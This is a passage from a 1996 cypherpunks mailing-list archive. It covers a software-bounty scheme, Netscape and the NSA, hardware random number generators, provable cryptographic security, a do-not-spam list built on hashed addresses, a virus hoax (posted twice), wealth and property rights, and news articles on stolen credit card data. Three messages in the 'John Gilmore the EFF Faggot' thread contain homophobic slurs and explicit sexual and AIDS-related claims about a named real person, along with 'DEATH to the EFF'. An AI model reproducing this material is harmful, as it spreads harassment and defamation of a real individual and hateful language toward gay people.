       technology to contain (i.e. WYSIWYG, Postscript output, Outliner etc.)

    4) Desired "quality" level: Proof of Concept, Alpha, Beta, Release etc. 

    5) Copyright status desired--whether the software will be owned by the 
       initiator of the bounty (in which case it is unlikely that anyone 
       else will contribute), owned by the programmer (well someone might
       be that magnanomous), or "copylefted".

    6) Where the initiators money is to go if the bounty is not claimed: 
       I will provide a short (8 or 10) list of charities that the money 
       will go to if the bounty is not met. This is to keep the initiator
       honest, as well as the server. Each contributor will also get this 
       choice. 

    I am sure that I am missing something here, and I will need some 
    assistance in fleshing this out, as well as a couple of people to write
    different specs as examples.  

Adding to the bounty:

    The bounty will be considered added to when the deposit clears and 
    is credited by the bank. 

    A person adding to the bounty will also be allowed to choose from the 
    list as to where they would like their money to go if the bounty 
    expires.   
 
Fees:

    The Organization will get 2% of any bounty where the software or 
    Technology that is copylefted. 20% of any other scheme.
 
    Adjudication will incur an additional fee of 2 to 5% depending on the 
    difficulty in judging the claim. 

    All interest that acrues belongs to the Organization, and will be used 
    to defray any costs, or to provide for additional bounties should there
    be an apprecialble excess.

Status:

    At this point in time I am (obviously) still in the process of developing 
    the procedures. I have registered a Domain Name (bounty.org) and I have 
    a couple promises off assistance in certain areas. As well, I have 
    a server to start off with.  
 
Where I need help at this point: 

    Legal issues. Any lawyers want to talk to me about this? 
 
    Comments. 

I will be working on this, revising it, and soon I will be putting it up on 
www.bounty.org.  

Postmodernism is the refusal to think--Ron Carrier            petro@suba.com 
Deconstruction is the refusal to believe that anyone else can either.
Revolution and War are not murder unless you lose. This is a basic tenet 
of civilization.--Jim Choate on the cpunks list.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Tartaglia <tag@silvix.sirinet.net>
Date: Mon, 25 Nov 1996 21:34:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Netscape working with the NSA.
Message-ID: <199611260534.FAA14999@silvix.sirinet.net>
MIME-Version: 1.0
Content-Type: text/plain



Check out the following:
http://www-tradoc.army.mil/dcsim/browser.htm

Here's an excerpt:

> ...Netscape has been working with NSA...Their proposed solution is based
> on the use of Fortezza card technology.  In November NSA expects to
> certify Netscape Navigator 3.0 for "unclassified but sensitive" use...

Tim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Pomes <ppomes@Qualcomm.com>
Date: Tue, 26 Nov 1996 06:09:34 -0800 (PST)
To: jim bell <jimbell@pacifier.com>
Subject: Re: market for hardware RNG?
In-Reply-To: <199611260503.VAA27444@mail.pacifier.com>
Message-ID: <13033.849017303@zelkova.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


There are some commercial products worth studying.  See
<http://rainbow.rmi.net/~comscire/> for one.

/pbp





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Tue, 26 Nov 1996 03:46:33 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: John Gilmore the EFF Faggot
In-Reply-To: <199611251507.QAA07561@basement.replay.com>
Message-ID: <Pine.LNX.3.95.961126063946.1790B-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


This data on John Gilmore must be published.
His sucking cock at this San Fransisco bathhouse
is something that everybody should know about.

On Mon, 25 Nov 1996, Anonymous wrote:

> frantz@netcom.com (Bill Frantz) wrote:
> 
> >At  6:15 AM 11/24/96 -0500, aga <aga@dhp.com> wrote:
> >>On Sun, 24 Nov 1996, John Anonymous MacDonald wrote:
> >actually the message was from lucifer@dhp.com:
> >
> >>> aga <aga@dhp.com> writes:
> >... messages suppressed
> 
> You bet they want to suppress the truth about them being faggots!
> 
> Faggot John Gilmore does NOT eat pussy. He only eats asshole if it's got
> a big dick up in front. Whoever calls Gilmore bisexual is a fucking liar.
> John likes to suck cocks at his San Fransicso bathhouse (the Toad Hole).
> 
> >It looks like our juvenile "friend" is talking to himself.  I am truely
> >sorry that he feels a need to harass ladies who have actually made  ^
> >something of their lives.
> 
> Gilmore's friends try to drag every lady Gilmore knows into this shit.
> Gilmore is a fag. Gilmore does NOT eat pussy. Not Denning's, not Dyson's.
> 
> >-------------------------------------------------------------------------
> >Bill Frantz       | The lottery is a tax on    | Periwinkle -- Consulting
> >(408)356-8506     | those who can't do math.   | 16345 Englewood Ave.
> >frantz@netcom.com |       - Who 1st said this? | Los Gatos, CA 95032, USA
> 
> You can say that again, good buddy.
> 
> diGriz
> 

does this John Gilmore have AIDS yet?

DEATH to the EFF !!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Boursy <boursy@earthlink.net>
Date: Tue, 26 Nov 1996 05:07:16 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: John Gilmore the EFF Faggot
In-Reply-To: <Pine.LNX.3.95.961126063946.1790B-100000@dhp.com>
Message-ID: <329AEC5F.4E48@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


aga wrote:
> 
> DEATH to the EFF !!!


  Well the EFF has been morally dead for a very
long time--the majority of their funing comes
from large corporate interests, they ALWAYS side
with business owners ove users, and the ACLU shot
them down for their active role in approval
of the Exon Ammendment.  They are essentially a
lobby for business interests on the net and
could give a shit about individual users rights.
They are not deserving of any respect.

                       Steve




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Tue, 26 Nov 1996 06:10:31 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: John Gilmore the EFF Faggot
In-Reply-To: <329AEC5F.4E48@earthlink.net>
Message-ID: <Pine.LNX.3.95.961126090027.4030H-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 26 Nov 1996, Stephen Boursy wrote:

> aga wrote:
> > 
> > DEATH to the EFF !!!
> 
> 
>   Well the EFF has been morally dead for a very
> long time--the majority of their funing comes
> from large corporate interests, they ALWAYS side
> with business owners over users, 

Yes, and that is the most disgusting thing about
them.  They got their original money from the Greatfull Dead,
and now that they are dead, the EFF is a whore.
Users should always come before any ISP.

> and the ACLU shot
> them down for their active role in approval
> of the Exon Ammendment.  

Yes, thank God for the ACLU jews.  Without them we would
all be in a lot of trouble.

> They are essentially a
> lobby for business interests on the net and
> could give a shit about individual users rights.

Very true, and they are directly associated with the UUNET 
cabal.  And since their leader is a faggot, they should not
be recognized as a valid representative of any Netizens.

> They are not deserving of any respect.
> 
>                        Steve
> 

Particularly since John Gilmore is an admitted
bath-house Faggot, who spreads AIDS all over SF.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Tue, 26 Nov 1996 09:44:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Provably "Secure" Crypto (was: IPG Algorithm Broken!)
Message-ID: <199611261727.JAA14042@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



At 12:28 PM 11/25/1996, Dana W. Albrecht wrote:
>For an (again, non-cryptographic) example of a proof of the second sort 
>--- that is, that "any algorithm that solves a given problem requires a 
>minimal running time" --- consider the proof that the "minimal" number 
>of key comparisons in the worst case required to sort a random list of 
>elements for which only an ordering relationship is known is O(nlog(n)).  
>See Knuth, Volume 3, section 5.3.  For a simpler example, a standard 
>"binary" search which requires O(log(n)) comparisons to find a given 
>element in the worst case is provably the optimal algorithm for this 
>task.

What is the longest running provably optimal algorithm?  Would it be
possible to construct a crypto system from it?

A relatively weak crypto system which is provably no weaker than it
appeared would have its uses.

>Comments, anyone?

Congratulations on your excellent post.

diGriz






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Tue, 26 Nov 1996 09:43:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Provably "Secure" Crypto (was: IPG Algorithm Broken!)
Message-ID: <199611261728.JAA14047@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



At 7:39 PM 11/25/1996, The Deviant wrote:
>> Rigorous proofs of the non-existence of an algorithm are not new.  
>> Neither are rigorous proofs that any algorithm which can solve a given 
>> problem requires a minimal running time.  Or, in an even stronger sense, 

>Hrmmm... I seem to see a problem (namely Moore's first law) in assigning
>anything a "minimal running time".  Perhaps "minimal instruction count"
>would be more suited to your example.  Because if you're talking about
>time, it essentially boils down to "the longer something takes the less
>time it takes".

"Introduction to Algorithms" by Cormen, Leiserson, and Rivest is a
good introduction to Big O notation.  The problem you raise is the
motivation behind this notation.

diGriz






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 26 Nov 1996 07:18:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Provably "Secure" Crypto (was: IPG Algorithm Broken!)
In-Reply-To: <Pine.LNX.3.94.961126020057.2424A-100000@random.sp.org>
Message-ID: <v03007816aec0afa72c97@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:41 am -0500 11/26/96, Paul Foley wrote:
>There's a Moore's second law?

"When the fabs cost $10 billion to build, all bets are off." ;-)

That's expected to happen in 10 years or so. Fab prices have been going up
by an order of magnitude every N years since the beginning of
semiconductors. Forbes did an article on this earlier this year, I think.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Tue, 26 Nov 1996 09:43:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Provably "Secure" Crypto
Message-ID: <199611261737.JAA14215@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



At 4:18 AM 11/26/1996, Peter M Allan wrote:
>> Which part of this have you failed to understand?  Look in section 5.3.1
>> of Volume 3 of "The Art of Computer Programming" by Knuth.  You will find
>> there a rigorous proof that the "information theoretic lower bound" of
>> an algorithm which sorts by comparison of keys is O(nlg(n)).

>That is a bound on a _reliable_ algorithm.  A faster one is to shuffle
>the elements and present it as sorted.  Lightning fast, but only with
>low probability of correctness.  That is what we are up against in a key
>search attack.  The other guy just might guess my 100 bit key first time,
>millionth time or whatever - early enough anyway.

>So to get a lower bound you have to show that a lucky guess cannot be
>distinguished from an unlucky one - and if you do that without a one
>time pad I take my hat off.

If the chance of a successful guess is absurdly low, the algorithm can
be considered to be secure.  It is quite unlikely that you will guess
a random 128-bit key.  Hence, you could have a secure algorithm in
which a successful guess can be distinguished from an unsuccessful
one.

diGriz






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Omegaman" <omega@bigeasy.com>
Date: Tue, 26 Nov 1996 08:34:07 -0800 (PST)
To: ichudov@algebra.com
Subject: Re: Another Nutty Idea about SPAM
Message-ID: <199611261635.KAA04691@bigeasy.com>
MIME-Version: 1.0
Content-Type: text/plain


> Steven Garman wrote:
> > Once method of combatting the spammers is to use disinformation.  For example
> > we use new addresses for their "remove" lists to check on their honesty.
> > 
> > What about attacking the lists themselves with false data?  Say you run a site.
(snip)

Igor Chudov wrote:
> Another nutty idea: to create a database of people who do NOT want to
> receive unsolicited advertisements, and make it widely available.

Of course.  But this does not address the issue of "unscrupulous 
spammers" which is what Steven was commenting upon.
 
> The obvious problem is that some very uncsrupulous spammers would want
> to grab this database and use it as a source of email addresses. 
> 
> This problem has a solution, however: instead of distributing people's
> email addresses, distribute MD5 checksums of their addresses. For 
> example, an entry for ichudov@algebra.com would be 
> 
> 	b51175dae78f25427351d5e3ff43de30
> 
> There is no way to guess the original text from an MD5 checksum.
> 
> Spammers should be advised to exclude all addresses with MD5 checksums from
> that database from the recipient list, and include instructions on how
> to get one added to the database into their spams.

Okay fine.  The spammer is "advised" but if he is unscrupulous in the 
first place, he'll simply ignore the advice and continue bulk-mailing 
to every address he can grab.  
 
> Database maintainers could even provide a email filter-bot that would
> accept recipient lists by email and send back the same lists, but
> WITHOUT addresses that wish not to receive spam. This way stupid
> low-tech spammers (who make up the majority) will be able to process
> their email lists quickly and easily.

Indeed, stupid low-tech spammers would benefit from such a service if 
they wish to honor "do not send" requests.
 
> This database may be maintained centrally. Users may be able to sign up
> for inclusion into that database by email or by filling out a Web-based 
> form. Identity verifications may be done by using cookie protocol.

I like the idea and if I had the resources, I would do it personally. 
Optimistically, many bulk e-mailers would sign on to the plan.  
(Ironically, one would probably have to solicit bulk e-mailers to 
sign up).  However, many, being unscrupulous, ignorant, etc. will not 
be involved.

The only way I see to get bulk e-mailers to utilize this service is 
to offer a positive and/or negative incentive for usage of the 
service.  ie. "What do I gain by elminating people from my bulk 
mail-outs?  What can be done if I don't follow this protocol?"

Ideas?  Comments?

me
--------------------------------------------------------------
 Omegaman <mailto:omega@bigeasy.com>
 PGP Key fingerprint =  6D 31 C3 00 77 8C D1 C2  
                        59 0A 01 E3 AF 81 94 63 
Send a message with the text "get key" in the 
"Subject:" field to get a copy of my public key.
--------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@miron.vip.best.com
Date: Tue, 26 Nov 1996 11:09:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: SAFEPASSAGE BRINGS STRONG CRYPTO TO WEB BROWSERS WORLDWIDE
In-Reply-To: <199611252011.MAA27220@clotho.c2.org>
Message-ID: <199611261857.KAA00518@miron.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: sameer <sameer@c2.net>:
> 
>       SAFEPASSAGE BRINGS STRONG CRYPTO TO WEB BROWSERS WORLDWIDE

BTW, this doesn't come with source code.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cracker@icon.co.za
Date: Tue, 26 Nov 1996 01:37:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Tell me this,referring to Symantec's claim.
Message-ID: <199611260935.LAA26558@mail1.icon.co.za>
MIME-Version: 1.0
Content-Type: text/plain



Okay granted,i am virtually sure Deeyenda does not exhist,but i asked a simple question.
Altavista is a cute idea though ;) 
Who posted this shit then,someone care to get back to him????
>The internet community has again been plagued by another virus.This message is being spread
>throughout the internet,including USENET posting,EMAIL and other inherent activities...The 
>reason for all the attention is because of the nature of this virus and the potential security risks
>it makes.Instead of a destructive trojan virus (most viruses!),this virus,referred to as Deeyenda
>Maddick,performs a comprehensive search on your computer,looking for valuable information
>such as email and login,passwords,credit cards,personal info,etc. The Deeyenda virus also has
>the capability to stay memory resident whil running a host of applications and operating systems,
>such as Windows 3.11 and Windows 95.What this means to internet users is that when a login and
>PASSWORD are sent to the server,this virus can COPY this information and SEND IT OUT TO AN
>UNKNOWN ADDRESS (varies).
>The reson for this warning is because the Deeyenda virus is virtually undetectable.Once attacked
>your computer will be unsecure.Although it can attack any O/S,this virus is most likely to attack >those users viewing Java enhanced Web Pages (Netscape 2.0 + Microsoft Internet Explorer 3.0 +
>which are running on Windows 95) . Researchers at Princeton University have found this on a >number of world wide web pages and fear its spread.
> Please pass this on,for we must alert the general public at the security risks
>Steven K. Johnson
>Computer Center
>Carnegie Mellon University
>(412) 455-3756
>e-mail : SJohnson14@cmu.edu

Sounds like a pretty amazing virus to me??? More a crock of shit than anything else,but...
Hey maybe it'll run for president as well....
Sorry to inconvenience anybody,ridicule should have a purpose ;)

J a m e s
"Lead.Follow. Or get out of the way"
--------------------------------------------------------------------------------------------
Type Bits/KeyID    Date       User ID
pub  1024/9E318AA5 1996/09/24 Cracker <cracker@icon.co.za>

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAzJHdKwAAAEEALl3A6auLG0JLdtgEzl6KfPNqbTTSDX4L4To2b7PLqGDVV5r
BezC9dD/ITrCK9M64juiQ2p/DNjIihnXlEsJCy2btypStypQgU1fvAei3AnZ1cQ8
NiAnHNS+ImUAJgZjSHEQSevGE53IUovmWQ7YHUz9VpTTCtoJoUKxYuqeMYqlAAUR
tBxDcmFja2VyIDxjcmFja2VyQGljb24uY28uemE+iQCVAwUQMkd0rkKxYuqeMYql
AQEjagP/cYgGLAkWZJLeRcM4URwBX3J/0R54DadVnsvvoxDkzilv7U02IXZGZGnA
CvXsu2sThS7qDBiHFop/OZs3WmlQbQ4BAZ/hiCs5tSU2e7fkk0EKxsGAD1pTbw/J
rRU4WePLc++vv+6CBKw5NCSR5kMh8H3X4qtZZ9dYX9zsuzWKdpk=
=YGH8
-----END PGP PUBLIC KEY BLOCK-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cracker@icon.co.za
Date: Tue, 26 Nov 1996 01:35:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Tell me this,referring to Symantec's claim.
Message-ID: <199611260935.LAA26567@mail1.icon.co.za>
MIME-Version: 1.0
Content-Type: text/plain



Okay granted,i am virtually sure Deeyenda does not exhist,but i asked a simple question.
Altavista is a cute idea though ;) 
Who posted this shit then,someone care to get back to him????
>The internet community has again been plagued by another virus.This message is being spread
>throughout the internet,including USENET posting,EMAIL and other inherent activities...The 
>reason for all the attention is because of the nature of this virus and the potential security risks
>it makes.Instead of a destructive trojan virus (most viruses!),this virus,referred to as Deeyenda
>Maddick,performs a comprehensive search on your computer,looking for valuable information
>such as email and login,passwords,credit cards,personal info,etc. The Deeyenda virus also has
>the capability to stay memory resident whil running a host of applications and operating systems,
>such as Windows 3.11 and Windows 95.What this means to internet users is that when a login and
>PASSWORD are sent to the server,this virus can COPY this information and SEND IT OUT TO AN
>UNKNOWN ADDRESS (varies).
>The reson for this warning is because the Deeyenda virus is virtually undetectable.Once attacked
>your computer will be unsecure.Although it can attack any O/S,this virus is most likely to attack >those users viewing Java enhanced Web Pages (Netscape 2.0 + Microsoft Internet Explorer 3.0 +
>which are running on Windows 95) . Researchers at Princeton University have found this on a >number of world wide web pages and fear its spread.
> Please pass this on,for we must alert the general public at the security risks
>Steven K. Johnson
>Computer Center
>Carnegie Mellon University
>(412) 455-3756
>e-mail : SJohnson14@cmu.edu

Sounds like a pretty amazing virus to me??? More a crock of shit than anything else,but...
Hey maybe it'll run for president as well....
Sorry to inconvenience anybody,ridicule should have a purpose ;)

J a m e s
"Lead.Follow. Or get out of the way"
--------------------------------------------------------------------------------------------
Type Bits/KeyID    Date       User ID
pub  1024/9E318AA5 1996/09/24 Cracker <cracker@icon.co.za>

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAzJHdKwAAAEEALl3A6auLG0JLdtgEzl6KfPNqbTTSDX4L4To2b7PLqGDVV5r
BezC9dD/ITrCK9M64juiQ2p/DNjIihnXlEsJCy2btypStypQgU1fvAei3AnZ1cQ8
NiAnHNS+ImUAJgZjSHEQSevGE53IUovmWQ7YHUz9VpTTCtoJoUKxYuqeMYqlAAUR
tBxDcmFja2VyIDxjcmFja2VyQGljb24uY28uemE+iQCVAwUQMkd0rkKxYuqeMYql
AQEjagP/cYgGLAkWZJLeRcM4URwBX3J/0R54DadVnsvvoxDkzilv7U02IXZGZGnA
CvXsu2sThS7qDBiHFop/OZs3WmlQbQ4BAZ/hiCs5tSU2e7fkk0EKxsGAD1pTbw/J
rRU4WePLc++vv+6CBKw5NCSR5kMh8H3X4qtZZ9dYX9zsuzWKdpk=
=YGH8
-----END PGP PUBLIC KEY BLOCK-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Zerucha <root@deimos.ceddec.com>
Date: Tue, 26 Nov 1996 08:47:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: wealth and property rights
In-Reply-To: <MAPI.Id.0016.006f6e67616c74203030303730303037@MAPI.to.RFC822>
Message-ID: <Pine.LNX.3.95.961126110818.4290A-100000@deimos.ceddec.com>
MIME-Version: 1.0
Content-Type: text/plain


Some basic points on the thread

1. For wealth to be "handed down", it must be earned or confiscated first.
Mao's widow lived quite well during Mao's life and for a while after his
death.  Also, if there was no direct way to pass wealth on to offspring,
it would be consumed or destroyed by the generation which created it.  You
may not agree with the choice of the original Kennedys and Rockefellers,
but limiting that choice is not without consequence - the wealth will
still not end up where you want it, and a great amount will be left
uncreated.

2. In a socialist society wealth is confiscated at gunpoint.  In a
capitalist society, I have to provide something that you want more than
your wealth in order to obtain it.  Bill Gates has lots of money because
people buy Windows.  They can have Linux for the price of a download or
cheap CD.  Are the people who choose to give $100 to Bill Gates evil?  Why
doesn't Bill Gates give me a copy of Windows 95 if I give $100 to Mother
Theresa?  Is Bill Gates evil?  If Bill Gates received nothing for Windows,
how would he pay his employees and manufacturers who develop and package
it, or should they be content to be charitable slaves and starve as long
as Mother Theresa gets the $100?  Linux is "better" and free.  Maybe we
should dissolve Microsoft and take all it's wealth and give it to the
poor and tell everyone to use Linux and stop wasting their wealth.  Of
course people might object, so we need to bring in the guns and tanks,
just like Stalin needed to do to the uncharitable Ukranians.

3. If wealth isn't being transferred, it is most likely because Government
has created a monopoly or oligopoly.  If I have a better idea for a car, I
cannot simply just build one, since any modification to the powertrain has
to be certified by the EPA.  So if I could get 2 Miles/gallon better
mileage without a change in emissions for a $50 modification, I still have
to spend over $1 Million satisfying the bureaucracy and generating no
profit.  The existing auto industries have no incentive to change this
because these are sunk costs, and they can keep their oligopoly.

4. When you say wealth isn't being transferred, it is also generally
untrue.  While someone may be controlling it, their control is usually not
to leave it under a matress (which would make my wealth comparatively more
valuable).  Microsoft has lots of money because the foundations and Nth
generation wealthy are putting the funds into stocks and bonds of
corporations like Microsoft and government debt.  The companies are
renting the wealth of others.  They wouldn't stay wealthy long if all they
engaged in was consumption.  In this case, economies of scale work with
investment - it takes a fixed amount of analysis to guarantee a greater
profit, so $100 will not be invested as efficiently as $100 Million.

5. Government is the least efficient means of resolving the problem.  The
current welfare system is such that simply transferring the budget of all
the programs would make every poor person middle class.  Confiscating the
wealth of the rich would likely be used employ more people generating
endless debates about who to give it to, than actual beneficiaries.  You
can see this with some class action cases (e.g. asbestos) where the
lawyers split up big fees, and the injured plaintiffs get only a token
amount.

6. No one has given any reason why the dollar following the 10-millionth
has less claim of ownership than the first 10-million.  You can dislike
the situation, but I would like to hear a *consistent* theory of property
rights that holds a sliding scale of claim based on volume.  Does the
grocer with 200 tomatoes need to give away 20 because a store down the
street has only 180?  What if the situation is reversed the next day?

tz@execpc.com
finger tz@execpc.com for PGP key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Tue, 26 Nov 1996 10:17:28 -0800 (PST)
To: snow <snow@smoke.suba.com>
Subject: Re: wealth and property rights
In-Reply-To: <199611260331.VAA00208@smoke.suba.com>
Message-ID: <Pine.BSF.3.91.961126120317.12312B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain


> exactly _what_ are those entities, and what does that wealth consist of? 
> 
>     Real estate? Money in the bank? -or- things like stocks, bonds, and 
> other _investments_? 
> Petro, Christopher C.
> petro@suba.com <prefered for any non-list stuff>
> snow@smoke.suba.com
> 

Take a look in the Forbes 400 listings of th of the most wealthy 
Americans. I'm sure you can find a copy at your local library. If not, 
there's a copy somewhere under my sofa, next to an old tennis ball 
covered with dog spit.

The tennis ball, that is. Although one of the Hunts has a few teeth 
marks ...

:)

-r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Tue, 26 Nov 1996 10:13:40 -0800 (PST)
To: jimbell@pacifier.com>
Subject: Re: market for hardware RNG?
Message-ID: <199611261813.MAA11361@mail.execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


> But on thinking about this a little more, I began to wonder if anybody 
> really wants this.  Pessimistically, it occurs to me that:
> 
> 1.  Many if not most people don't even understand why a hardware RNG is 
> desirable.

While your potential market is small, it is dedicated.  Developers of 
crypto products are always looking for good random sources.  People 
that really NEED more reliable sources of random bits are willing to 
pay for them.  I dont think your market will be end users.  But a 
little market research should turn up a healthy margin for you.

> 2.  Users of programs like PGP today already get at least a fairly decent 
> RNG already.  Would they want better?  (I'm not suggesting a total 
> replacement; I assume that the output of any hardware RNG would be hashed 
> with more "traditional" PC sources, like disk timings, keyboard timings, 
> etc, which should deter attempts to attack just the hardware part.)

Why would you hash good RNG output?  I understand your desire to 
deter hardware only attacks.  I just think it might be an 
overreaction.  Of course mine could be an under-reaction 8-)

> 
> 3.    Even hardware RNG's aren't "perfect":  they could be subverted, 
> replaced, or perhaps influenced.  Would someone who was sufficiently 
> sophisticated as to recognize the need for it actually accept a real, 
> functioning device?

It would have to go through rigorous testing in the crypto community. 
 RNGs v. PRNGs goes through a yearly debate here on cpunks.  There 
have been some good discussions on the use of white noise and other 
potential hardware sources.  Im not sure if hks is back up or not, 
but you might look there.

If an independant entity could certify the product with a good 
reputation for dedication to the community, you would get much 
milage.  PGP, Inc. might be interested for instance.  I mean I have 
used PGP for years but have not had the time to go through the code, 
etc.  I trust it because Phil's reputation precedes him.

> On the other hand... if this kind of pessimism had infected Phil Zimmermann 
> before he wrote PGP 1.0, he might have deleted the first 50 lines of code, 
> erased the file, and said, "fuck it!"

Go for it Jim.  I would be happy to support you in any way I could.  
Let me know.  It sounds like a good idea.

> 
> Jim Bell
> jimbell@pacifier.com

Matt
 
_________________________________________________________________________
Matthew J. Miszewski                 |               <mjmiski@execpc.com>
Practice Crypto Civil Disobedience   |  Export your favorite Cryptosystem
-------------------------------------------------------------------------
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alzheimer@juno.com (Ronald Raygun Remailer)
Date: Tue, 26 Nov 1996 09:16:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Copyright violations
Message-ID: <19961126.111613.12279.0.alzheimer@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


 
American Banker: Friday, November 22, 1996
 
MasterCard Raps Visa Security After Theft 
 
By JEREMY QUITTNER
 
The theft of a personal computer with several hundred thousand credit
card
accounts stored in its memory has led MasterCard to suggest the security
procedures of rival Visa are inadequate. The computer, stolen from Visa's
San Mateo, Calif., data processing center early this month, contained
information transmitted from point of sale machines for 314,000 active
credit
card accounts -- from Visa, MasterCard, American Express, Discover, and
Citicorp's Diners Club.
 
Visa has offered to pay $20 per account, potentially $6.3 million, to
replace
the cards. 
 
Although the five brands reacted quickly to the crime, and there has been
no
loss due to fraud, the incident shows how account information is
vulnerable to
fraud and theft from many directions. 
 
Michael Stenger, special agent, financial crimes division for the U.S.
Secret

Service, said criminals will go after account information wherever they
can
find it. 
 
"The computer is seen as a facilitator and a storage point," he said.
"The main
thing is (the thieves) need the information." 
 
Account information from the different credit card networks is commonly
routed through MasterCard and Visa processing systems from point of sale
machines, and sent to the appropriate party. 
 
"The question is, why was the information downloaded?" asked MasterCard
spokesman Sean Healy. "We don't do that type of downloading." 
 
He said MasterCard stores point of sale information on cartridges in high
security locations in its St. Louis processing facility, where it would
be
"virtually impossible to replicate" the Visa theft. 
 
However, David Melancon, a Visa International spokesman, contended,
"Any card company that processes transactions" downloads account
information. 
 
Jerome Svigals, a smart-card and security consultant in Redwood City,
Calif., said Visa would have downloaded this information only if it was
working in the capacity of Vital Processing Services, its merchant
processing
arm. 
 
He added the computer probably contained magnetic stripe information,
such
as account numbers, expiration dates, and encrypted verification codes. 
 
"There is little or no protection against this problem," he said. 
 
Visa said it may have been an inside job, although no one has been
arrested.
The thief or thieves were probably more interested in the computer
hardware
than the account information, Visa said. 
 
"We have had rigorous plant security, but obviously not secure enough,"
Mr.
Melancon added. 
 
Visa, which said the vast majority of affected accounts were its own,
said it
immediately contacted all the parties involved and recommended they get
in
touch with cardholders. 
 
Mr. Healy said the stolen computer contained information on accounts at
500
of MasterCard's member banks. 
 
"We are recommending they close the affected accounts and issue new
cards," Mr. Healy said. "We are monitoring authorizations very closely
and
have issued a worldwide security alert." 
 
American Express, on the other hand, has chosen to monitor its own
accounts without informing cardholders. It would not specify how many of
its
accounts were involved. 
 
"The accounts are being monitored for fraud, but we have not found any,"
said Gail Wasserman, an American Express spokeswoman. 
 
Diners Club and Dean Witter, Discover & Co. said they were taking
measures to protect their cardholders. 
 
  
American Banker: Friday, November 22, 1996
 
Bank Group Issues Guidelines for Protecting Consumer
Privacy 
 
By Barbara A. Rehm
 
Retail bankers on Thursday unveiled a nine-point plan to safeguard
financial
information about their customers. 
 
The Consumer Bankers Association is providing the privacy blueprint to
its
members, 900 financial institutions with more than $2.5 trillion in
assets. 
 
"We are confident that these guidelines will enable our members to
continue
delivering top-quality service and choice while maintaining the trust of
consumers," said Pam Flaherty, Citibank senior vice president and a
member of trade group's board. 
 
The guidelines, in the works for two years, are designed to help banks
maintain customer confidentiality standards even as new technologies
speed
information processing. 
 
For example, under the plan, banks "will limit the use and collection of
information about our customers to what is necessary to administer our
business, provide superior service, and offer opportunities that we think
will
be of interest to them." 
 
The blueprint also notes that banks will provide data about their
customers
only to "reputable information reporting agencies." 
 
The Consumer Bankers issued the privacy guidelines to show the federal
government that the banking industry is policing itself and no new
regulations
are needed. 
 
 
American Banker: Friday, November 22, 1996
 
Get On-Line Quickly or Get Left Behind 
 
By JENNIFER KINGSON BLOOM and JEFFREY KUTLER 
 
Almost 600 people paid a quick visit this week to a future in which most
consumers carry smart cards, do most of their banking and shopping on the
Internet, and rest assured that their financial institutions have taken
all
necessary steps to ensure payment security and personal privacy. 
 
By now the bankers among the 600 have returned to a reality in which most
